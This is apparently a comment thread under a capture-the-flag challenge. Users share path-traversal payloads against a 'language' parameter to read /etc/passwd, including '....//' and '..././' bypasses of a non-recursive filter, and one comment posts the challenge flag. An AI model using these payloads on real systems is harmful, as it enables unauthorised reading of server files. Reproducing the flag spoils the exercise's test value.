解析:https://blog.csdn.net/guanrongl/article/details/142967307
?language=..//etc/passwd
?language=/etc/passwd 这也行
?language=/../../../../../etc/passwd
直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../
使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可
/?language=/etc/passwd
直接用file:///etc/passwd居然也行 oAo
我这样怎么不行
...
评论
小白帽来挖个漏洞 15天前
举报
解析:https://blog.csdn.net/guanrongl/article/details/142967307
阿甘先生 17天前
举报
?language=..//etc/passwd
jun1223 2月前
举报
?language=/etc/passwd 这也行
userxin 3月前
举报
?language=/../../../../../etc/passwd
hbesljx 4月前
举报
直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../
1005667204 5月前
举报
使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd
18993258097 5月前
举报
shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}
菜鸡的小韩 5月前
举报
这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可
ABC第一深情 7月前
举报
/?language=/etc/passwd
曦羽unT0x1ns 7月前
举报
直接用file:///etc/passwd居然也行 oAo
13657809271 1月前
举报
我这样怎么不行